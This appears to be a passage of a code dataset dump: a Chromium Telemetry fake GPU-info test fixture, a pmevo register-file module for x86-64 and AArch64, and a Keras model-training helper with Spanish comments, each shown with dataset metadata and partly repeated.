'GL_NV_vertex_array_range GL_NV_vertex_array_range2 '
'GL_NV_vertex_attrib_integer_64bit '
'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program '
'GL_NV_vertex_program1_1 GL_NV_vertex_program2 '
'GL_NV_vertex_program2_option GL_NV_vertex_program3 '
'GL_NVX_conditional_render GL_NVX_gpu_memory_info '
'GL_SGIS_generate_mipmap GL_SGIS_texture_lod '
'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum '
},
'devices':
[
{
'device_string': '',
'vendor_id': 4318.0,
'device_id': 3576.0,
'vendor_string': ''
}],
'driver_bug_workarounds':
['clear_uniforms_before_first_program_use',
'disable_gl_path_rendering',
'init_gl_position_in_vertex_shader',
'init_vertex_attributes',
'remove_pow_with_constant_exponent',
'scalarize_vec_and_mat_constructor_args',
'use_current_program_after_successful_link',
'use_virtualized_gl_contexts']
} | en | 0.809252 | # Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # This dictionary of GPU information was captured from a run of # Telemetry on a Linux workstation with NVIDIA GPU. It helps test # telemetry.internal.platform's GPUInfo class, and specifically the # attributes it expects to find in the dictionary; if the code changes # in an incompatible way, tests using this fake GPU info will begin # failing, indicating this fake data must be updated. # # To regenerate it, import pdb in # telemetry/internal/platform/gpu_info.py and add a call to # pdb.set_trace() in GPUInfo.FromDict before the return statement. # Print the attrs dictionary in the debugger and copy/paste the result # on the right-hand side of this assignment. Then run: # # pyformat [this file name] | sed -e "s/'/'/g" # # and put the output into this file. | 1.883435 | 2 |
vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | 6 | 8009 | <filename>vm_setup/pmevo/measurement-server/PITE/register_file.py
#! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC, abstractmethod
from collections import defaultdict
import re
class RegisterFile(ABC):
registers = NotImplemented
def __init__(self):
# for each register kind an index pointing to the next register to use
self.reset_indices()
def reset_indices(self):
self.next_indices = defaultdict(lambda:0)
def get_memory_base(self):
return self.registers["MEM"][0]["64"]
def get_div_register(self):
return self.registers["DIV"][0]["64"]
def get_clobber_list(self):
res = []
for k, v in self.registers.items():
for regset in v:
reg = regset["repr"]
if reg is not None:
res.append(reg)
return res
class X86_64_RegisterFile(RegisterFile):
registers = {
"G": # general purpose registers
[
# {"64": "rax", "32": "eax", "repr": "rax"},
# {"64": "rcx", "32": "ecx", "repr": "rcx"},
# {"64": "rdx", "32": "edx", "repr": "rdx"},
{"64": "rbx", "32": "ebx", "repr": "rbx"}, # used by gcc
# {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc
# {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc
{"64": "rsi", "32": "esi", "repr": "rsi"}, # used for string instructions
{"64": "rdi", "32": "edi", "repr": "rdi"}, # used for string instructions
{"64": "r8", "32": "r8d", "repr": "r8"},
{"64": "r9", "32": "r9d", "repr": "r9"},
{"64": "r10", "32": "r10d", "repr": "r10"},
{"64": "r11", "32": "r11d", "repr": "r11"},
{"64": "r12", "32": "r12d", "repr": "r12"},
# {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register
# {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register
# {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame
],
"V": # vector registers
[
{"256": "ymm0", "128": "xmm0", "repr": "ymm0"},
{"256": "ymm1", "128": "xmm1", "repr": "ymm1"},
{"256": "ymm2", "128": "xmm2", "repr": "ymm2"},
{"256": "ymm3", "128": "xmm3", "repr": "ymm3"},
{"256": "ymm4", "128": "xmm4", "repr": "ymm4"},
{"256": "ymm5", "128": "xmm5", "repr": "ymm5"},
{"256": "ymm6", "128": "xmm6", "repr": "ymm6"},
{"256": "ymm7", "128": "xmm7", "repr": "ymm7"},
{"256": "ymm8", "128": "xmm8", "repr": "ymm8"},
{"256": "ymm9", "128": "xmm9", "repr": "ymm9"},
{"256": "ymm10", "128": "xmm10", "repr": "ymm10"},
{"256": "ymm11", "128": "xmm11", "repr": "ymm11"},
{"256": "ymm12", "128": "xmm12", "repr": "ymm12"},
{"256": "ymm13", "128": "xmm13", "repr": "ymm13"},
{"256": "ymm14", "128": "xmm14", "repr": "ymm14"},
{"256": "ymm15", "128": "xmm15", "repr": "ymm15"},
],
"DIV": # register for non-zero divisor
[
{"64": "r13", "32": "r13d", "repr": None},
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
"MEM": # base register for memory operands
[
{"64": "r14", "32": "r14d", "repr": None}
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
}
def __init__(self):
super().__init__()
class AArch64_RegisterFile(RegisterFile):
    registers = {
        "G": # general purpose registers
[
# {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame
# {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame
{"64": "x2", "32": "w2", "repr": "x2"},
{"64": "x3", "32": "w3", "repr": "x3"},
{"64": "x4", "32": "w4", "repr": "x4"},
{"64": "x5", "32": "w5", "repr": "x5"},
{"64": "x6", "32": "w6", "repr": "x6"},
{"64": "x7", "32": "w7", "repr": "x7"},
{"64": "x8", "32": "w8", "repr": "x8"},
{"64": "x9", "32": "w9", "repr": "x9"},
{"64": "x10", "32": "w10", "repr": "x10"},
{"64": "x11", "32": "w11", "repr": "x11"},
{"64": "x12", "32": "w12", "repr": "x12"},
{"64": "x13", "32": "w13", "repr": "x13"},
{"64": "x14", "32": "w14", "repr": "x14"},
{"64": "x15", "32": "w15", "repr": "x15"},
{"64": "x16", "32": "w16", "repr": "x16"},
{"64": "x17", "32": "w17", "repr": "x17"},
{"64": "x18", "32": "w18", "repr": "x18"},
{"64": "x19", "32": "w19", "repr": "x19"},
{"64": "x20", "32": "w20", "repr": "x20"},
{"64": "x21", "32": "w21", "repr": "x21"},
{"64": "x22", "32": "w22", "repr": "x22"},
{"64": "x23", "32": "w23", "repr": "x23"},
{"64": "x24", "32": "w24", "repr": "x24"},
{"64": "x25", "32": "w25", "repr": "x25"},
{"64": "x26", "32": "w26", "repr": "x26"},
{"64": "x27", "32": "w27", "repr": "x27"},
# {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory
# {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor
# {"64": "x30", "32": "w30", "repr": "x30"}, # link register
# {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register
],
"F": # vector/floating point registers
[
{"VEC": "v0", "128": "q0", "64": "d0", "32": "s0", "16": "h0", "8": "b0", "repr": "v0"},
{"VEC": "v1", "128": "q1", "64": "d1", "32": "s1", "16": "h1", "8": "b1", "repr": "v1"},
{"VEC": "v2", "128": "q2", "64": "d2", "32": "s2", "16": "h2", "8": "b2", "repr": "v2"},
{"VEC": "v3", "128": "q3", "64": "d3", "32": "s3", "16": "h3", "8": "b3", "repr": "v3"},
{"VEC": "v4", "128": "q4", "64": "d4", "32": "s4", "16": "h4", "8": "b4", "repr": "v4"},
{"VEC": "v5", "128": "q5", "64": "d5", "32": "s5", "16": "h5", "8": "b5", "repr": "v5"},
{"VEC": "v6", "128": "q6", "64": "d6", "32": "s6", "16": "h6", "8": "b6", "repr": "v6"},
{"VEC": "v7", "128": "q7", "64": "d7", "32": "s7", "16": "h7", "8": "b7", "repr": "v7"},
{"VEC": "v8", "128": "q8", "64": "d8", "32": "s8", "16": "h8", "8": "b8", "repr": "v8"},
{"VEC": "v9", "128": "q9", "64": "d9", "32": "s9", "16": "h9", "8": "b9", "repr": "v9"},
{"VEC": "v10", "128": "q10", "64": "d10", "32": "s10", "16": "h10", "8": "b10", "repr": "v10"},
{"VEC": "v11", "128": "q11", "64": "d11", "32": "s11", "16": "h11", "8": "b11", "repr": "v11"},
{"VEC": "v12", "128": "q12", "64": "d12", "32": "s12", "16": "h12", "8": "b12", "repr": "v12"},
{"VEC": "v13", "128": "q13", "64": "d13", "32": "s13", "16": "h13", "8": "b13", "repr": "v13"},
{"VEC": "v14", "128": "q14", "64": "d14", "32": "s14", "16": "h14", "8": "b14", "repr": "v14"},
{"VEC": "v15", "128": "q15", "64": "d15", "32": "s15", "16": "h15", "8": "b15", "repr": "v15"},
{"VEC": "v16", "128": "q16", "64": "d16", "32": "s16", "16": "h16", "8": "b16", "repr": "v16"},
{"VEC": "v17", "128": "q17", "64": "d17", "32": "s17", "16": "h17", "8": "b17", "repr": "v17"},
{"VEC": "v18", "128": "q18", "64": "d18", "32": "s18", "16": "h18", "8": "b18", "repr": "v18"},
{"VEC": "v19", "128": "q19", "64": "d19", "32": "s19", "16": "h19", "8": "b19", "repr": "v19"},
{"VEC": "v20", "128": "q20", "64": "d20", "32": "s20", "16": "h20", "8": "b20", "repr": "v20"},
{"VEC": "v21", "128": "q21", "64": "d21", "32": "s21", "16": "h21", "8": "b21", "repr": "v21"},
{"VEC": "v22", "128": "q22", "64": "d22", "32": "s22", "16": "h22", "8": "b22", "repr": "v22"},
{"VEC": "v23", "128": "q23", "64": "d23", "32": "s23", "16": "h23", "8": "b23", "repr": "v23"},
{"VEC": "v24", "128": "q24", "64": "d24", "32": "s24", "16": "h24", "8": "b24", "repr": "v24"},
{"VEC": "v25", "128": "q25", "64": "d25", "32": "s25", "16": "h25", "8": "b25", "repr": "v25"},
{"VEC": "v26", "128": "q26", "64": "d26", "32": "s26", "16": "h26", "8": "b26", "repr": "v26"},
{"VEC": "v27", "128": "q27", "64": "d27", "32": "s27", "16": "h27", "8": "b27", "repr": "v27"},
{"VEC": "v28", "128": "q28", "64": "d28", "32": "s28", "16": "h28", "8": "b28", "repr": "v28"},
{"VEC": "v29", "128": "q29", "64": "d29", "32": "s29", "16": "h29", "8": "b29", "repr": "v29"},
{"VEC": "v30", "128": "q30", "64": "d30", "32": "s30", "16": "h30", "8": "b30", "repr": "v30"},
{"VEC": "v31", "128": "q31", "64": "d31", "32": "s31", "16": "h31", "8": "b31", "repr": "v31"},
],
"DIV": # register for non-zero divisor
[
{"64": "x29", "32": "w29", "repr": None},
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
"MEM": # base register for memory operands
[
{"64": "x28", "32": "w28", "repr": None},
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
}
def __init__(self):
super().__init__()
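# Minimal usage sketch: queries the register files defined above using only
# methods from this file. How the pmevo measurement server actually consumes
# these classes is not shown here, so the driver below is illustrative only.
if __name__ == "__main__":
    rf = X86_64_RegisterFile()
    print("memory base register:", rf.get_memory_base())   # "r14"
    print("divisor register:", rf.get_div_register())      # "r13"
    print("clobbered registers:", ", ".join(rf.get_clobber_list()))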
| <filename>vm_setup/pmevo/measurement-server/PITE/register_file.py
#! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC, abstractmethod
from collections import defaultdict
import re
class RegisterFile(ABC):
registers = NotImplemented
def __init__(self):
# for each register kind an index pointing to the next register to use
self.reset_indices()
def reset_indices(self):
self.next_indices = defaultdict(lambda:0)
def get_memory_base(self):
return self.registers["MEM"][0]["64"]
def get_div_register(self):
return self.registers["DIV"][0]["64"]
def get_clobber_list(self):
res = []
for k, v in self.registers.items():
for regset in v:
reg = regset["repr"]
if reg is not None:
res.append(reg)
return res
class X86_64_RegisterFile(RegisterFile):
registers = {
"G": # general purpose registers
[
# {"64": "rax", "32": "eax", "repr": "rax"},
# {"64": "rcx", "32": "ecx", "repr": "rcx"},
# {"64": "rdx", "32": "edx", "repr": "rdx"},
{"64": "rbx", "32": "ebx", "repr": "rbx"}, # used by gcc
# {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc
# {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc
{"64": "rsi", "32": "esi", "repr": "rsi"}, # used for string instructions
{"64": "rdi", "32": "edi", "repr": "rdi"}, # used for string instructions
{"64": "r8", "32": "r8d", "repr": "r8"},
{"64": "r9", "32": "r9d", "repr": "r9"},
{"64": "r10", "32": "r10d", "repr": "r10"},
{"64": "r11", "32": "r11d", "repr": "r11"},
{"64": "r12", "32": "r12d", "repr": "r12"},
# {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register
# {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register
# {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame
],
"V": # vector registers
[
{"256": "ymm0", "128": "xmm0", "repr": "ymm0"},
{"256": "ymm1", "128": "xmm1", "repr": "ymm1"},
{"256": "ymm2", "128": "xmm2", "repr": "ymm2"},
{"256": "ymm3", "128": "xmm3", "repr": "ymm3"},
{"256": "ymm4", "128": "xmm4", "repr": "ymm4"},
{"256": "ymm5", "128": "xmm5", "repr": "ymm5"},
{"256": "ymm6", "128": "xmm6", "repr": "ymm6"},
{"256": "ymm7", "128": "xmm7", "repr": "ymm7"},
{"256": "ymm8", "128": "xmm8", "repr": "ymm8"},
{"256": "ymm9", "128": "xmm9", "repr": "ymm9"},
{"256": "ymm10", "128": "xmm10", "repr": "ymm10"},
{"256": "ymm11", "128": "xmm11", "repr": "ymm11"},
{"256": "ymm12", "128": "xmm12", "repr": "ymm12"},
{"256": "ymm13", "128": "xmm13", "repr": "ymm13"},
{"256": "ymm14", "128": "xmm14", "repr": "ymm14"},
{"256": "ymm15", "128": "xmm15", "repr": "ymm15"},
],
"DIV": # register for non-zero divisor
[
{"64": "r13", "32": "r13d", "repr": None},
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
"MEM": # base register for memory operands
[
{"64": "r14", "32": "r14d", "repr": None}
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
}
def __init__(self):
super().__init__()
class AArch64_RegisterFile(RegisterFile):
    registers = {
        "G": # general purpose registers
[
# {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame
# {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame
{"64": "x2", "32": "w2", "repr": "x2"},
{"64": "x3", "32": "w3", "repr": "x3"},
{"64": "x4", "32": "w4", "repr": "x4"},
{"64": "x5", "32": "w5", "repr": "x5"},
{"64": "x6", "32": "w6", "repr": "x6"},
{"64": "x7", "32": "w7", "repr": "x7"},
{"64": "x8", "32": "w8", "repr": "x8"},
{"64": "x9", "32": "w9", "repr": "x9"},
{"64": "x10", "32": "w10", "repr": "x10"},
{"64": "x11", "32": "w11", "repr": "x11"},
{"64": "x12", "32": "w12", "repr": "x12"},
{"64": "x13", "32": "w13", "repr": "x13"},
{"64": "x14", "32": "w14", "repr": "x14"},
{"64": "x15", "32": "w15", "repr": "x15"},
{"64": "x16", "32": "w16", "repr": "x16"},
{"64": "x17", "32": "w17", "repr": "x17"},
{"64": "x18", "32": "w18", "repr": "x18"},
{"64": "x19", "32": "w19", "repr": "x19"},
{"64": "x20", "32": "w20", "repr": "x20"},
{"64": "x21", "32": "w21", "repr": "x21"},
{"64": "x22", "32": "w22", "repr": "x22"},
{"64": "x23", "32": "w23", "repr": "x23"},
{"64": "x24", "32": "w24", "repr": "x24"},
{"64": "x25", "32": "w25", "repr": "x25"},
{"64": "x26", "32": "w26", "repr": "x26"},
{"64": "x27", "32": "w27", "repr": "x27"},
# {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory
# {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor
# {"64": "x30", "32": "w30", "repr": "x30"}, # link register
# {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register
],
"F": # vector/floating point registers
[
{"VEC": "v0", "128": "q0", "64": "d0", "32": "s0", "16": "h0", "8": "b0", "repr": "v0"},
{"VEC": "v1", "128": "q1", "64": "d1", "32": "s1", "16": "h1", "8": "b1", "repr": "v1"},
{"VEC": "v2", "128": "q2", "64": "d2", "32": "s2", "16": "h2", "8": "b2", "repr": "v2"},
{"VEC": "v3", "128": "q3", "64": "d3", "32": "s3", "16": "h3", "8": "b3", "repr": "v3"},
{"VEC": "v4", "128": "q4", "64": "d4", "32": "s4", "16": "h4", "8": "b4", "repr": "v4"},
{"VEC": "v5", "128": "q5", "64": "d5", "32": "s5", "16": "h5", "8": "b5", "repr": "v5"},
{"VEC": "v6", "128": "q6", "64": "d6", "32": "s6", "16": "h6", "8": "b6", "repr": "v6"},
{"VEC": "v7", "128": "q7", "64": "d7", "32": "s7", "16": "h7", "8": "b7", "repr": "v7"},
{"VEC": "v8", "128": "q8", "64": "d8", "32": "s8", "16": "h8", "8": "b8", "repr": "v8"},
{"VEC": "v9", "128": "q9", "64": "d9", "32": "s9", "16": "h9", "8": "b9", "repr": "v9"},
{"VEC": "v10", "128": "q10", "64": "d10", "32": "s10", "16": "h10", "8": "b10", "repr": "v10"},
{"VEC": "v11", "128": "q11", "64": "d11", "32": "s11", "16": "h11", "8": "b11", "repr": "v11"},
{"VEC": "v12", "128": "q12", "64": "d12", "32": "s12", "16": "h12", "8": "b12", "repr": "v12"},
{"VEC": "v13", "128": "q13", "64": "d13", "32": "s13", "16": "h13", "8": "b13", "repr": "v13"},
{"VEC": "v14", "128": "q14", "64": "d14", "32": "s14", "16": "h14", "8": "b14", "repr": "v14"},
{"VEC": "v15", "128": "q15", "64": "d15", "32": "s15", "16": "h15", "8": "b15", "repr": "v15"},
{"VEC": "v16", "128": "q16", "64": "d16", "32": "s16", "16": "h16", "8": "b16", "repr": "v16"},
{"VEC": "v17", "128": "q17", "64": "d17", "32": "s17", "16": "h17", "8": "b17", "repr": "v17"},
{"VEC": "v18", "128": "q18", "64": "d18", "32": "s18", "16": "h18", "8": "b18", "repr": "v18"},
{"VEC": "v19", "128": "q19", "64": "d19", "32": "s19", "16": "h19", "8": "b19", "repr": "v19"},
{"VEC": "v20", "128": "q20", "64": "d20", "32": "s20", "16": "h20", "8": "b20", "repr": "v20"},
{"VEC": "v21", "128": "q21", "64": "d21", "32": "s21", "16": "h21", "8": "b21", "repr": "v21"},
{"VEC": "v22", "128": "q22", "64": "d22", "32": "s22", "16": "h22", "8": "b22", "repr": "v22"},
{"VEC": "v23", "128": "q23", "64": "d23", "32": "s23", "16": "h23", "8": "b23", "repr": "v23"},
{"VEC": "v24", "128": "q24", "64": "d24", "32": "s24", "16": "h24", "8": "b24", "repr": "v24"},
{"VEC": "v25", "128": "q25", "64": "d25", "32": "s25", "16": "h25", "8": "b25", "repr": "v25"},
{"VEC": "v26", "128": "q26", "64": "d26", "32": "s26", "16": "h26", "8": "b26", "repr": "v26"},
{"VEC": "v27", "128": "q27", "64": "d27", "32": "s27", "16": "h27", "8": "b27", "repr": "v27"},
{"VEC": "v28", "128": "q28", "64": "d28", "32": "s28", "16": "h28", "8": "b28", "repr": "v28"},
{"VEC": "v29", "128": "q29", "64": "d29", "32": "s29", "16": "h29", "8": "b29", "repr": "v29"},
{"VEC": "v30", "128": "q30", "64": "d30", "32": "s30", "16": "h30", "8": "b30", "repr": "v30"},
{"VEC": "v31", "128": "q31", "64": "d31", "32": "s31", "16": "h31", "8": "b31", "repr": "v31"},
],
"DIV": # register for non-zero divisor
[
{"64": "x29", "32": "w29", "repr": None},
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
"MEM": # base register for memory operands
[
{"64": "x28", "32": "w28", "repr": None},
# no need to represent this in the clobber list as it is
            # hardwired to this register anyway
],
}
def __init__(self):
super().__init__()
| en | 0.790764 | #! /usr/bin/env python3 # vim: et:ts=4:sw=4:fenc=utf-8 # for each register kind an index pointing to the next register to use # general purpose registers # {"64": "rax", "32": "eax", "repr": "rax"}, # {"64": "rcx", "32": "ecx", "repr": "rcx"}, # {"64": "rdx", "32": "edx", "repr": "rdx"}, # used by gcc # {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc # {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc # used for string instructions # used for string instructions # {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register # {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register # {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame # vector registers # register for non-zero divisor # no need to represent this in the clobber list as it is # hardwired to a this register anyway # base register for memory operands # no need to represent this in the clobber list as it is # hardwired to a this register anyway # general puprose registers # {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame # {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame # {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory # {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor # {"64": "x30", "32": "w30", "repr": "x30"}, # link register # {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register # vector/floating point registers # register for non-zero divisor # no need to represent this in the clobber list as it is # hardwired to a this register anyway # base register for memory operands # no need to represent this in the clobber list as it is # hardwired to a this register anyway | 2.347323 | 2 |
src/training_utils/training.py | JoseLuisRojasAranda/tfmodels | 1 | 8010 | <filename>src/training_utils/training.py
import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Importa cosas de Keras API
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Importa callbacks del modelo
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Importa cosas para graficar el entrenamiento
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
def continue_training(path_to_model, dataset):
if not path.exists(path_to_model):
print("[ERROR] El path a la carpeta del modelo no existe")
return
# carga el setup del modelo
setup = None
with open(path_to_model+"setup.json", "r") as data:
setup = json.load(data)
# carga el estado de entrenamiento
state = None
with open(path_to_model+"checkpoints/"+"training_state.json", "r") as data:
state = json.load(data)
    print("[INFO] Continuando entrenamiento de modelo.")
# carga el modelo
model_name = "model_checkpoint_{}.h5".format(state["epoch"]-1)
model = tf.keras.models.load_model(path_to_model+"checkpoints/"+model_name)
# vuelve a compilar el modelo
opt = Adam(lr=state["learning_rate"])
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], initial_epoch=state["epoch"],
path=setup["path"], continue_train=True, classes=setup["classes"])
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
def train_model(setup, model, dataset):
# Asegura que el path sea el correcto
if not path.exists(setup["path"]):
os.makedirs(setup["path"])
else:
# Borra las carpetas si ya existen
if path.exists(setup["path"]+"checkpoints"):
shutil.rmtree(setup["path"]+"checkpoints")
if path.exists(setup["path"]+"logs"):
shutil.rmtree(setup["path"]+"logs")
# crea carpeta donde se van a guardar los checkpoints
if not path.exists(setup["path"]+"checkpoints"):
os.mkdir(setup["path"] + "checkpoints")
# Escribe el setup del entrenamiento
with open(setup["path"]+"setup.json", "w") as writer:
json.dump(setup, writer, indent=4)
print("[INFO] Entrenando modelo.")
# Dibuja la arquitectura del modelo
plot_model(model, to_file=setup["path"]+"model_architecture.png",
show_shapes=True, show_layer_names=True, expand_nested=False)
# Crea optimizador, por defecto Adam
opt = Adam(lr=setup["learning_rate"])
#opt = RMSprop(lr=setup["learning_rate"])
# Compila el modelo
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], path=setup["path"], classes=setup["classes"])
# Metodo, que entrena un modelo ya compilado, implementa callbacks de
# tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre
# mejoras en el loss, tambien grafica y crea matriz de confusion
# Args:
# compiled_model: keras.Model ya compilado
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predict
def fit_model(compiled_model=None, # El modelo debe de estar compilado
dataset=None,
opt=None,
epochs=None,
initial_epoch=0,
path=None,
continue_train=False,
classes=None):
# obtiene el dataset
train, test = dataset
# Callbacks durante entrenamiento
relative = 0
if initial_epoch >= 1:
relative = initial_epoch
callbacks = [
#TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative),
CSVLogger(path+"training_log.csv", append=continue_train),
TensorBoard(log_dir=path+"logs")
]
# Entrena el modelo
history = compiled_model.fit(train, initial_epoch=initial_epoch, epochs=epochs,
callbacks=callbacks, validation_data=test)
# Guarda el modelo
print("[INFO] Serializing model.")
compiled_model.save(path + "model.h5")
# Crea grafica del entrenamiento
graph_model_metrics(csv_path=path+"training_log.csv",
img_path=path+"metrics_graph.png")
# Crea confusion matrix
if test != None:
print("[INFO] Creando matriz de confusion")
graph_confusion_matrix(model=compiled_model, test_dataset=test,
classes=classes, path=path+"confusion_matrix.png")
def load_model(path):
model = tf.keras.models.load_model(path + "model.h5")
with open(path + "setup.json", "r") as data:
setup = json.load(data)
return model, setup["classes"]
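# Minimal usage sketch: the dictionary below holds exactly the keys read by
# train_model/fit_model above; the concrete values, the tiny model and the
# random dataset are illustrative assumptions. Note that plot_model() inside
# train_model requires pydot and graphviz to be installed.
if __name__ == "__main__":
    example_setup = {
        "path": "results/example_run/",   # trailing slash: the code above concatenates paths
        "learning_rate": 1e-3,
        "loss": "sparse_categorical_crossentropy",
        "metrics": ["accuracy"],
        "epochs": 1,
        "classes": ["class_0", "class_1"],
    }
    toy_model = Sequential([tf.keras.layers.Dense(2, activation="softmax", input_shape=(4,))])
    features = np.random.rand(32, 4).astype("float32")
    labels = np.random.randint(0, 2, size=(32,))
    toy_ds = tf.data.Dataset.from_tensor_slices((features, labels)).batch(8)
    train_model(example_setup, toy_model, (toy_ds, toy_ds))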
| <filename>src/training_utils/training.py
import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Importa cosas de Keras API
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Importa callbacks del modelo
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Importa cosas para graficar el entrenamiento
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
def continue_training(path_to_model, dataset):
if not path.exists(path_to_model):
print("[ERROR] El path a la carpeta del modelo no existe")
return
# carga el setup del modelo
setup = None
with open(path_to_model+"setup.json", "r") as data:
setup = json.load(data)
# carga el estado de entrenamiento
state = None
with open(path_to_model+"checkpoints/"+"training_state.json", "r") as data:
state = json.load(data)
    print("[INFO] Continuando entrenamiento de modelo.")
# carga el modelo
model_name = "model_checkpoint_{}.h5".format(state["epoch"]-1)
model = tf.keras.models.load_model(path_to_model+"checkpoints/"+model_name)
# vuelve a compilar el modelo
opt = Adam(lr=state["learning_rate"])
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], initial_epoch=state["epoch"],
path=setup["path"], continue_train=True, classes=setup["classes"])
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
def train_model(setup, model, dataset):
# Asegura que el path sea el correcto
if not path.exists(setup["path"]):
os.makedirs(setup["path"])
else:
# Borra las carpetas si ya existen
if path.exists(setup["path"]+"checkpoints"):
shutil.rmtree(setup["path"]+"checkpoints")
if path.exists(setup["path"]+"logs"):
shutil.rmtree(setup["path"]+"logs")
# crea carpeta donde se van a guardar los checkpoints
if not path.exists(setup["path"]+"checkpoints"):
os.mkdir(setup["path"] + "checkpoints")
# Escribe el setup del entrenamiento
with open(setup["path"]+"setup.json", "w") as writer:
json.dump(setup, writer, indent=4)
print("[INFO] Entrenando modelo.")
# Dibuja la arquitectura del modelo
plot_model(model, to_file=setup["path"]+"model_architecture.png",
show_shapes=True, show_layer_names=True, expand_nested=False)
# Crea optimizador, por defecto Adam
opt = Adam(lr=setup["learning_rate"])
#opt = RMSprop(lr=setup["learning_rate"])
# Compila el modelo
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], path=setup["path"], classes=setup["classes"])
# Metodo, que entrena un modelo ya compilado, implementa callbacks de
# tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre
# mejoras en el loss, tambien grafica y crea matriz de confusion
# Args:
# compiled_model: keras.Model ya compilado
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predict
def fit_model(compiled_model=None, # El modelo debe de estar compilado
dataset=None,
opt=None,
epochs=None,
initial_epoch=0,
path=None,
continue_train=False,
classes=None):
# obtiene el dataset
train, test = dataset
# Callbacks durante entrenamiento
relative = 0
if initial_epoch >= 1:
relative = initial_epoch
callbacks = [
#TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative),
CSVLogger(path+"training_log.csv", append=continue_train),
TensorBoard(log_dir=path+"logs")
]
# Entrena el modelo
history = compiled_model.fit(train, initial_epoch=initial_epoch, epochs=epochs,
callbacks=callbacks, validation_data=test)
# Guarda el modelo
print("[INFO] Serializing model.")
compiled_model.save(path + "model.h5")
# Crea grafica del entrenamiento
graph_model_metrics(csv_path=path+"training_log.csv",
img_path=path+"metrics_graph.png")
# Crea confusion matrix
if test != None:
print("[INFO] Creando matriz de confusion")
graph_confusion_matrix(model=compiled_model, test_dataset=test,
classes=classes, path=path+"confusion_matrix.png")
def load_model(path):
model = tf.keras.models.load_model(path + "model.h5")
